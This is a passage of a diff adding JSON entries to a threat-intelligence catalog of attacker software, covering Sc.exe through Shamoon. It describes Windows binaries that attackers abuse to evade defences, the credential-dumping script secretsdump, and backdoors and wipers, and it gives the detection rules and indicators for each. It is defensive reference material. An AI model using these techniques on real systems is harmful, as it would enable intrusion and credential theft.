"uuid": "51b405bf-637a-46e7-960f-44f7e964ca7e", + "value": "Sc.exe" + }, + { + "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Used by Windows to manage services\n\n**Author:** Oddvar Moe\n\n**Paths:**\n* C:\\Windows\\System32\\sc.exe\n* C:\\Windows\\SysWOW64\\sc.exe\n\n**Resources:**\n* [https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/](https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/)\n\n**Detection:**\n* Sigma: [proc_creation_win_susp_service_creation.yml](https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_susp_service_creation.yml)\n* Sigma: [proc_creation_win_sc_change_sevice_image_path_by_non_admin.yml](https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_sc_change_sevice_image_path_by_non_admin.yml)\n* Sigma: [proc_creation_win_sc_service_path_modification.yml](https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_sc_service_path_modification.yml)\n* Splunk: [sc_exe_manipulating_windows_services.yml](https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/sc_exe_manipulating_windows_services.yml)\n* Elastic: [lateral_movement_cmd_service.toml](https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/lateral_movement_cmd_service.toml)\n* IOC: Unexpected service creation\n* IOC: Unexpected service modification[[Sc.exe - LOLBAS Project](/references/5ce3ef73-f789-4939-a60e-e0a373048bda)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5160", + "source": "Tidal Cyber", + "tags": [ + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "51b405bf-637a-46e7-960f-44f7e964ca7e", + "type": "similar" + } + ], + "uuid": "41be663f-ecc9-4ab6-afeb-c52737f84858", + "value": "Sc" + }, + { + "description": "", + "meta": { + "id": "cef89380-3b62-4a3d-a5b3-f26643c108ec" + }, + "related": [ + { + "dest-uuid": "2aacbf3a-a359-41d2-9a71-76447f0545b5", + "type": "similar" + } + ], + "uuid": "8e0f3e81-6583-40f4-824c-2f5ba6b7e19d", + "value": "schtasks.exe" + }, + { + "description": "[schtasks](https://app.tidalcyber.com/software/2aacbf3a-a359-41d2-9a71-76447f0545b5) is used to schedule execution of programs or scripts on a Windows system to run at a specific date and time. [[TechNet Schtasks](https://app.tidalcyber.com/references/17c03e27-222d-41b5-9fa2-34f0939e5371)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0111", + "source": "MITRE", + "tags": [ + "f0c54030-956a-4bac-9f98-deb2349183ac", + "35e694ec-5133-46e3-b7e1-5831867c3b55", + "15787198-6c8b-4f79-bf50-258d55072fee", + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "9da726e6-af02-49b8-8ebe-7ea4235513c9", + "type": "used-by" + }, + { + "dest-uuid": "5825a840-5577-4ffc-a08d-3f48d64395cb", + "type": "used-by" + }, + { + "dest-uuid": "a2add2a0-2b54-4623-a380-a9ad91f1f2dd", + "type": "used-by" + }, + { + "dest-uuid": "37f317d8-02f0-43d4-8a7d-7a65ce8aadf1", + "type": "used-by" + }, + { + "dest-uuid": "a80c00b2-b8b6-4780-99bb-df8fe921947d", + "type": "used-by" + }, + { + "dest-uuid": "4c3e48b9-4426-4271-a7af-c3dfad79f447", + "type": "used-by" + }, + { + "dest-uuid": "ca93af75-0ffa-4df4-b86a-92d4d50e496e", + "type": "used-by" + }, + { + "dest-uuid": "0bc66e95-de93-4de7-b415-4041b7191f08", + "type": "used-by" + }, + { + "dest-uuid": "646e35d2-75de-4c1d-8ad3-616d3e155c5e", + "type": "used-by" + }, + { + "dest-uuid": "021b3c71-6467-4e46-a413-8b726f066f2c", + "type": "used-by" + }, + { + "dest-uuid": "c9703cd3-141c-43a0-a926-380082be5d04", + "type": "similar" + }, + { + "dest-uuid": "8e0f3e81-6583-40f4-824c-2f5ba6b7e19d", + "type": "similar" + } + ], + "uuid": "2aacbf3a-a359-41d2-9a71-76447f0545b5", + "value": "schtasks" + }, + { + "description": "[[Scriptrunner.exe - LOLBAS Project](/references/805d16cc-8bd0-4f80-b0ac-c5b5df51427c)]", + "meta": { + "id": "4882dbf4-7d84-45fc-9a06-055d8b429bfd", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "ba4d8522-9656-462e-b25e-32a9bba85a60", + "type": "similar" + } + ], + "uuid": "371af2c7-299d-48e3-ace1-a3e33ba2fedd", + "value": "Scriptrunner.exe" + }, + { + "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Execute binary through proxy binary to evade defensive counter measures\n\n**Author:** Oddvar Moe\n\n**Paths:**\n* C:\\Windows\\System32\\scriptrunner.exe\n* C:\\Windows\\SysWOW64\\scriptrunner.exe\n\n**Resources:**\n* [https://twitter.com/KyleHanslovan/status/914800377580503040](https://twitter.com/KyleHanslovan/status/914800377580503040)\n* [https://twitter.com/NickTyrer/status/914234924655312896](https://twitter.com/NickTyrer/status/914234924655312896)\n* [https://github.com/MoooKitty/Code-Execution](https://github.com/MoooKitty/Code-Execution)\n\n**Detection:**\n* Sigma: [proc_creation_win_servu_susp_child_process.yml](https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_servu_susp_child_process.yml)\n* IOC: Scriptrunner.exe should not be in use unless App-v is deployed[[Scriptrunner.exe - LOLBAS Project](/references/805d16cc-8bd0-4f80-b0ac-c5b5df51427c)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5161", + "source": "Tidal Cyber", + "tags": [ + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "371af2c7-299d-48e3-ace1-a3e33ba2fedd", + "type": "similar" + } + ], + "uuid": "ba4d8522-9656-462e-b25e-32a9bba85a60", + "value": "Scriptrunner" + }, + { + "description": "[[Scrobj.dll - LOLBAS Project](/references/c50ff71f-c742-4d63-a18e-e1ce41d55193)]", + "meta": { + "id": "ac56e479-6cf2-4c56-85cb-0c0d4c82c605", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "101f7867-9c5c-482e-b26e-9fdb8ff9b2c7", + "type": "similar" + } + ], + "uuid": "922a431d-1ebd-4ad2-a16d-054e3eb24a1f", + "value": "Scrobj.dll" + }, + { + "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Windows Script Component Runtime\n\n**Author:** Eral4m\n\n**Paths:**\n* c:\\windows\\system32\\scrobj.dll\n* c:\\windows\\syswow64\\scrobj.dll\n\n**Resources:**\n* [https://twitter.com/eral4m/status/1479106975967240209](https://twitter.com/eral4m/status/1479106975967240209)\n\n**Detection:**\n* IOC: Execution of rundll32.exe with 'GenerateTypeLib' and a protocol handler ('://') on the command line[[Scrobj.dll - LOLBAS Project](/references/c50ff71f-c742-4d63-a18e-e1ce41d55193)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5194", + "source": "Tidal Cyber", + "tags": [ + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "922a431d-1ebd-4ad2-a16d-054e3eb24a1f", + "type": "similar" + } + ], + "uuid": "101f7867-9c5c-482e-b26e-9fdb8ff9b2c7", + "value": "Scrobj" + }, + { + "description": "[SDBbot](https://app.tidalcyber.com/software/046bbd0c-bff5-46fc-9028-cbe46a9f8ec5) is a backdoor with installer and loader components that has been used by [TA505](https://app.tidalcyber.com/groups/b3220638-6682-4a4e-ab64-e7dc4202a3f1) since at least 2019.[[Proofpoint TA505 October 2019](https://app.tidalcyber.com/references/711ea2b3-58e2-4b38-aa71-877029c12e64)][[IBM TA505 April 2020](https://app.tidalcyber.com/references/bcef8bf8-5fc2-4921-b920-74ef893b8a27)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0461", + "source": "MITRE", + "tags": [ + "febea5b6-2ea2-402b-8bec-f3f5b3f73c59" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "b3220638-6682-4a4e-ab64-e7dc4202a3f1", + "type": "used-by" + }, + { + "dest-uuid": "92b03a94-7147-4952-9d5a-b4d24da7487c", + "type": "similar" + } + ], + "uuid": "046bbd0c-bff5-46fc-9028-cbe46a9f8ec5", + "value": "SDBbot" + }, + { + "description": "[SDelete](https://app.tidalcyber.com/software/3d4be65d-231b-44bb-8d12-5038a3d48bae) is an application that securely deletes data in a way that makes it unrecoverable. It is part of the Microsoft Sysinternals suite of tools. [[Microsoft SDelete July 2016](https://app.tidalcyber.com/references/356c7d49-5abc-4566-9657-5ce58cf7be67)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0195", + "source": "MITRE", + "tags": [ + "16b47583-1c54-431f-9f09-759df7b5ddb7" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "4c3e48b9-4426-4271-a7af-c3dfad79f447", + "type": "used-by" + }, + { + "dest-uuid": "b534349f-55a4-41b8-9623-6707765c3c50", + "type": "used-by" + }, + { + "dest-uuid": "7902f5cc-d6a5-4a57-8d54-4c75e0c58b83", + "type": "used-by" + }, + { + "dest-uuid": "58db02e6-d908-47c2-bc82-ed58ada61331", + "type": "used-by" + }, + { + "dest-uuid": "d8d19e33-94fd-4aa3-b94a-08ee801a2153", + "type": "similar" + } + ], + "uuid": "3d4be65d-231b-44bb-8d12-5038a3d48bae", + "value": "SDelete" + }, + { + "description": "", + "meta": { + "id": "90ca5f13-d1d1-4bc4-930b-3559db96efa7" + }, + "related": [ + { + "dest-uuid": "ae30d58e-21c5-41a4-9ebb-081dc1f26863", + "type": "similar" + } + ], + "uuid": "a2b8e082-e238-4bcc-89e0-f6fe424c1d89", + "value": "SeaDaddy" + }, + { + "description": "", + "meta": { + "id": "5dcc7cce-10fc-4a9b-922f-4b5b3bac6f17" + }, + "related": [ + { + "dest-uuid": "ae30d58e-21c5-41a4-9ebb-081dc1f26863", + "type": "similar" + } + ], + "uuid": "be5732aa-a2d1-4088-89af-caf36034f360", + "value": "SeaDesk" + }, + { + "description": "[SeaDuke](https://app.tidalcyber.com/software/ae30d58e-21c5-41a4-9ebb-081dc1f26863) is malware that was used by [APT29](https://app.tidalcyber.com/groups/4c3e48b9-4426-4271-a7af-c3dfad79f447) from 2014 to 2015. It was used primarily as a secondary backdoor for victims that were already compromised with [CozyCar](https://app.tidalcyber.com/software/c2353daa-fd4c-44e1-8013-55400439965a). [[F-Secure The Dukes](https://app.tidalcyber.com/references/cc0dc623-ceb5-4ac6-bfbb-4f8514d45a27)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0053", + "source": "MITRE", + "tags": [ + "8bf128ad-288b-41bc-904f-093f4fdde745" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "4c3e48b9-4426-4271-a7af-c3dfad79f447", + "type": "used-by" + }, + { + "dest-uuid": "67e6d66b-1b82-4699-b47a-e2efb6268d14", + "type": "similar" + }, + { + "dest-uuid": "a2b8e082-e238-4bcc-89e0-f6fe424c1d89", + "type": "similar" + }, + { + "dest-uuid": "be5732aa-a2d1-4088-89af-caf36034f360", + "type": "similar" + } + ], + "uuid": "ae30d58e-21c5-41a4-9ebb-081dc1f26863", + "value": "SeaDuke" + }, + { + "description": "[Seasalt](https://app.tidalcyber.com/software/3527b09b-f3f6-4716-9f90-64ea7d3b9d8a) is malware that has been linked to [APT1](https://app.tidalcyber.com/groups/5307bba1-2674-4fbd-bfd5-1db1ae06fc5f)'s 2010 operations. It shares some code similarities with [OceanSalt](https://app.tidalcyber.com/software/f1723994-058b-4525-8e11-2f0c80d8f3a4).[[Mandiant APT1 Appendix](https://app.tidalcyber.com/references/1f31c09c-6a93-4142-8333-154138c1d70a)][[McAfee Oceansalt Oct 2018](https://app.tidalcyber.com/references/04b475ab-c7f6-4373-a4b0-04b5d8028f95)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0345", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "5307bba1-2674-4fbd-bfd5-1db1ae06fc5f", + "type": "used-by" + }, + { + "dest-uuid": "b45747dc-87ca-4597-a245-7e16a61bc491", + "type": "similar" + } + ], + "uuid": "3527b09b-f3f6-4716-9f90-64ea7d3b9d8a", + "value": "Seasalt" + }, + { + "description": "[SEASHARPEE](https://app.tidalcyber.com/software/42c8504c-8a18-46d2-a145-35b0cd8ba669) is a Web shell that has been used by [OilRig](https://app.tidalcyber.com/groups/d01abdb1-0378-4654-aa38-1a4a292703e2). [[FireEye APT34 Webinar Dec 2017](https://app.tidalcyber.com/references/4eef7032-de14-44a2-a403-82aefdc85c50)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0185", + "source": "MITRE", + "tags": [ + "311abf64-a9cc-4c6a-b778-32c5df5658be" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "d01abdb1-0378-4654-aa38-1a4a292703e2", + "type": "used-by" + }, + { + "dest-uuid": "0998045d-f96e-4284-95ce-3c8219707486", + "type": "similar" + } + ], + "uuid": "42c8504c-8a18-46d2-a145-35b0cd8ba669", + "value": "SEASHARPEE" + }, + { + "description": "Seatbelt is a tool used to perform numerous security-oriented checks.[[U.S. CISA Understanding LockBit June 2023](/references/9c03b801-2ebe-4c7b-aa29-1b7a3625964a)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5042", + "source": "Tidal Cyber", + "tags": [ + "af5e9be5-b86e-47af-91dd-966a5e34a186", + "758c3085-2f79-40a8-ab95-f8a684737927", + "2185ed93-7e1c-4553-9452-c8411b5dca93", + "904ad11a-20ca-479c-ad72-74bd5d9dc7e4", + "1dc8fd1e-0737-405a-98a1-111dd557f1b5", + "35e694ec-5133-46e3-b7e1-5831867c3b55", + "15787198-6c8b-4f79-bf50-258d55072fee", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "d0f3353c-fbdd-4bd5-8793-a42e1f319b59", + "type": "used-by" + } + ], + "uuid": "74beac1c-8468-4f1e-8990-11a4eb7b0110", + "value": "Seatbelt" + }, + { + "description": "", + "meta": { + "id": "f7e571a6-c6db-47ec-b4cd-a9587115eea2", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "a1fef846-cb22-4885-aa14-cb67ab38fce4", + "type": "similar" + } + ], + "uuid": "8e8fdcd6-5b2f-4672-91fe-740555345883", + "value": "secretsdump.py" + }, + { + "description": "According to joint Cybersecurity Advisory AA23-319A (November 2023), secretsdump is a Python script \"used to extract credentials and other confidential information from a system\".[[U.S. CISA Rhysida Ransomware November 15 2023](/references/6d902955-d9a9-4ec1-8dd4-264f7594605e)] Secretsdump is publicly available and included as a module of Impacket, a tool for working with network protocols.[[GitHub secretsdump](/references/c29a90a7-016f-49b7-a970-334290964f19)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5072", + "source": "Tidal Cyber", + "tags": [ + "61b7b81d-3f98-4bed-97a9-d6c536b8969b", + "35e694ec-5133-46e3-b7e1-5831867c3b55", + "15787198-6c8b-4f79-bf50-258d55072fee", + "15b77e5c-2285-434d-9719-73c14beba8bd", + "ed2b3f47-3e07-4019-a9bf-ec9d87f28c96", + "dcd6d78a-50e9-4fbd-a36a-06fbe6b7b40c" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "3d77fb6c-cfb4-5563-b0be-7aa1ad535337", + "type": "used-by" + }, + { + "dest-uuid": "0610cd57-2511-467a-97e3-3c810384074f", + "type": "used-by" + }, + { + "dest-uuid": "d0f3353c-fbdd-4bd5-8793-a42e1f319b59", + "type": "used-by" + }, + { + "dest-uuid": "8e8fdcd6-5b2f-4672-91fe-740555345883", + "type": "similar" + } + ], + "uuid": "a1fef846-cb22-4885-aa14-cb67ab38fce4", + "value": "secretsdump" + }, + { + "description": "[ServHelper](https://app.tidalcyber.com/software/704ed49d-103c-4b33-b85c-73670cc1d719) is a backdoor first observed in late 2018. The backdoor is written in Delphi and is typically delivered as a DLL file.[[Proofpoint TA505 Jan 2019](https://app.tidalcyber.com/references/b744f739-8810-4fb9-96e3-6488f9ed6305)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0382", + "source": "MITRE", + "tags": [ + "84615fe0-c2a5-4e07-8957-78ebc29b4635" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "b3220638-6682-4a4e-ab64-e7dc4202a3f1", + "type": "used-by" + }, + { + "dest-uuid": "aae22730-e571-4d17-b037-65f2a3e26213", + "type": "similar" + } + ], + "uuid": "704ed49d-103c-4b33-b85c-73670cc1d719", + "value": "ServHelper" + }, + { + "description": "[Seth-Locker](https://app.tidalcyber.com/software/fb47c051-d22b-4a05-94a7-cf979419b60a) is a ransomware with some remote control capabilities that has been in use since at least 2021.\n[[Trend Micro Ransomware February 2021](https://app.tidalcyber.com/references/64a86a3f-0160-4766-9ac1-7d287eb2c323)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0639", + "source": "MITRE", + "tags": [ + "5e7433ad-a894-4489-93bc-41e90da90019", + "7e7b0c67-bb85-4996-a289-da0e792d7172" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "f931a0b9-0361-4b1b-bacf-955062c35746", + "type": "similar" + } + ], + "uuid": "fb47c051-d22b-4a05-94a7-cf979419b60a", + "value": "Seth-Locker" + }, + { + "description": "[[Setres.exe - LOLBAS Project](/references/631de0bd-d536-4183-bc5a-25af83bd795a)]", + "meta": { + "id": "ee17b779-c555-4ae0-9a76-56a24d647675", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "ad872ead-f3be-49df-b2f3-2526246acdf5", + "type": "similar" + } + ], + "uuid": "87bd69bf-cada-4225-a91e-a32add673522", + "value": "Setres.exe" + }, + { + "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Configures display settings\n\n**Author:** Grzegorz Tworek\n\n**Paths:**\n* c:\\windows\\system32\\setres.exe\n\n**Resources:**\n* [https://twitter.com/0gtweet/status/1583356502340870144](https://twitter.com/0gtweet/status/1583356502340870144)\n\n**Detection:**\n* Sigma: [proc_creation_win_lolbin_setres.yml](https://github.com/SigmaHQ/sigma/blob/19396788dbedc57249a46efed2bb1927abc376d4/rules/windows/process_creation/proc_creation_win_lolbin_setres.yml)\n* IOC: Unusual location for choice.exe file\n* IOC: Process created from choice.com binary\n* IOC: Existence of choice.cmd file[[Setres.exe - LOLBAS Project](/references/631de0bd-d536-4183-bc5a-25af83bd795a)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5162", + "source": "Tidal Cyber", + "tags": [ + "d75511ab-cbff-46d3-8268-427e3cff134a", + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "87bd69bf-cada-4225-a91e-a32add673522", + "type": "similar" + } + ], + "uuid": "ad872ead-f3be-49df-b2f3-2526246acdf5", + "value": "Setres" + }, + { + "description": "[[SettingSyncHost.exe - LOLBAS Project](/references/57f573f2-1c9b-4037-8f4d-9ae65d13af94)]", + "meta": { + "id": "0ab3517f-f1b5-4b85-81b7-1e887acf7cbf", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "e46a42d6-ca6e-4237-ab66-b0d102a580c7", + "type": "similar" + } + ], + "uuid": "ff7ceff1-6f98-4a50-9461-368b16d96b4b", + "value": "SettingSyncHost.exe" + }, + { + "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Host Process for Setting Synchronization\n\n**Author:** Elliot Killick\n\n**Paths:**\n* C:\\Windows\\System32\\SettingSyncHost.exe\n* C:\\Windows\\SysWOW64\\SettingSyncHost.exe\n\n**Resources:**\n* [https://www.hexacorn.com/blog/2020/02/02/settingsynchost-exe-as-a-lolbin/](https://www.hexacorn.com/blog/2020/02/02/settingsynchost-exe-as-a-lolbin/)\n\n**Detection:**\n* Sigma: [proc_creation_win_lolbin_settingsynchost.yml](https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_settingsynchost.yml)\n* IOC: SettingSyncHost.exe should not be run on a normal workstation[[SettingSyncHost.exe - LOLBAS Project](/references/57f573f2-1c9b-4037-8f4d-9ae65d13af94)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5163", + "source": "Tidal Cyber", + "tags": [ + "8929bc83-9ed6-4579-b837-40236b59b383", + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "ff7ceff1-6f98-4a50-9461-368b16d96b4b", + "type": "similar" + } + ], + "uuid": "e46a42d6-ca6e-4237-ab66-b0d102a580c7", + "value": "SettingSyncHost" + }, + { + "description": "[[Setupapi.dll - LOLBAS Project](/references/1a8a1434-fc4a-4c3e-9a9b-fb91692d7efd)]", + "meta": { + "id": "da642a14-5517-47b9-b2d7-09b461f8164c", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "e7d450ec-dd29-455f-8d26-f8a563e1e88d", + "type": "similar" + } + ], + "uuid": "ff4e0a76-a50f-4605-9e19-2cb2309bbda7", + "value": "Setupapi.dll" + }, + { + "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Windows Setup Application Programming Interface\n\n**Author:** LOLBAS Team\n\n**Paths:**\n* c:\\windows\\system32\\setupapi.dll\n* c:\\windows\\syswow64\\setupapi.dll\n\n**Resources:**\n* [https://github.com/huntresslabs/evading-autoruns](https://github.com/huntresslabs/evading-autoruns)\n* [https://twitter.com/pabraeken/status/994742106852941825](https://twitter.com/pabraeken/status/994742106852941825)\n* [https://windows10dll.nirsoft.net/setupapi_dll.html](https://windows10dll.nirsoft.net/setupapi_dll.html)\n\n**Detection:**\n* Sigma: [proc_creation_win_rundll32_setupapi_installhinfsection.yml](https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_rundll32_setupapi_installhinfsection.yml)\n* Sigma: [proc_creation_win_rundll32_susp_activity.yml](https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml)\n* Splunk: [detect_rundll32_application_control_bypass___setupapi.yml](https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/detect_rundll32_application_control_bypass___setupapi.yml)[[Setupapi.dll - LOLBAS Project](/references/1a8a1434-fc4a-4c3e-9a9b-fb91692d7efd)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5195", + "source": "Tidal Cyber", + "tags": [ + "da405033-3571-4f98-9810-53d9df1ac0fb", + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "ff4e0a76-a50f-4605-9e19-2cb2309bbda7", + "type": "similar" + } + ], + "uuid": "e7d450ec-dd29-455f-8d26-f8a563e1e88d", + "value": "Setupapi" + }, + { + "description": "[[FireEye APT41 Aug 2019](https://app.tidalcyber.com/references/20f8e252-0a95-4ebd-857c-d05b0cde0904)]", + "meta": { + "id": "e503dc0d-9c53-4110-a7da-bfc7ebcc3b3a" + }, + "related": [ + { + "dest-uuid": "5190f50d-7e54-410a-9961-79ab751ddbab", + "type": "similar" + } + ], + "uuid": "86e74984-d06d-4b3e-be56-8c3af2060e99", + "value": "POISONPLUG.SHADOW" + }, + { + "description": "[ShadowPad](https://app.tidalcyber.com/software/5190f50d-7e54-410a-9961-79ab751ddbab) is a modular backdoor that was first identified in a supply chain compromise of the NetSarang software in mid-July 2017. The malware was originally thought to be exclusively used by [APT41](https://app.tidalcyber.com/groups/502223ee-8947-42f8-a532-a3b3da12b7d9), but has since been observed to be used by various Chinese threat activity groups. [[Recorded Future RedEcho Feb 2021](https://app.tidalcyber.com/references/6da7eb8a-aab4-41ea-a0b7-5313d88cbe91)][[Securelist ShadowPad Aug 2017](https://app.tidalcyber.com/references/862877d7-e18c-4613-bdad-0700bf3d45ae)][[Kaspersky ShadowPad Aug 2017](https://app.tidalcyber.com/references/95c9a28d-6056-4f87-9a46-9491318889e2)] ", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0596", + "source": "MITRE", + "tags": [ + "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "502223ee-8947-42f8-a532-a3b3da12b7d9", + "type": "used-by" + }, + { + "dest-uuid": "0a245c5e-c1a8-480f-8655-bb2594e3266b", + "type": "used-by" + }, + { + "dest-uuid": "5825a840-5577-4ffc-a08d-3f48d64395cb", + "type": "used-by" + }, + { + "dest-uuid": "9f5c5672-5e7e-4440-afc8-3fdf46a1bb6c", + "type": "used-by" + }, + { + "dest-uuid": "646e35d2-75de-4c1d-8ad3-616d3e155c5e", + "type": "used-by" + }, + { + "dest-uuid": "ec9e00dd-0313-4d5b-8105-c20aa47abffc", + "type": "similar" + }, + { + "dest-uuid": "86e74984-d06d-4b3e-be56-8c3af2060e99", + "type": "similar" + } + ], + "uuid": "5190f50d-7e54-410a-9961-79ab751ddbab", + "value": "ShadowPad" + }, + { + "description": "[[Palo Alto Shamoon Nov 2016](https://app.tidalcyber.com/references/15007a87-a281-41ae-b203-fdafe02a885f)]", + "meta": { + "id": "ab151071-4f92-4e56-8108-d5f298a320f6" + }, + "related": [ + { + "dest-uuid": "840db1db-e262-4d6f-b6e3-2a64696a41c5", + "type": "similar" + } + ], + "uuid": "a834945d-2e57-44e0-9795-8bdc73208f61", + "value": "Disttrack" + }, + { + "description": "[Shamoon](https://app.tidalcyber.com/software/840db1db-e262-4d6f-b6e3-2a64696a41c5) is wiper malware that was first used by an Iranian group known as the \"Cutting Sword of Justice\" in 2012. Other versions known as Shamoon 2 and Shamoon 3 were observed in 2016 and 2018. [Shamoon](https://app.tidalcyber.com/software/840db1db-e262-4d6f-b6e3-2a64696a41c5) has also been seen leveraging [RawDisk](https://app.tidalcyber.com/software/d86a562d-d235-4481-9a3f-273fa3ebe89a) and Filerase to carry out data wiping tasks. The term Shamoon is sometimes used to refer to the group using the malware as well as the malware itself.[[Palo Alto Shamoon Nov 2016](https://app.tidalcyber.com/references/15007a87-a281-41ae-b203-fdafe02a885f)][[Unit 42 Shamoon3 2018](https://app.tidalcyber.com/references/c2148166-faf4-4ab7-a37e-deae0c88c08d)][[Symantec Shamoon 2012](https://app.tidalcyber.com/references/ac634e99-d951-402b-bb1c-e575753dfda8)][[FireEye Shamoon Nov 2016](https://app.tidalcyber.com/references/44b2eb6b-4902-4ca0-80e5-7333d620e075)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0140", + "source": "MITRE", + "tags": [ + "e809d252-12cc-494d-94f5-954c49eb87ce" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": 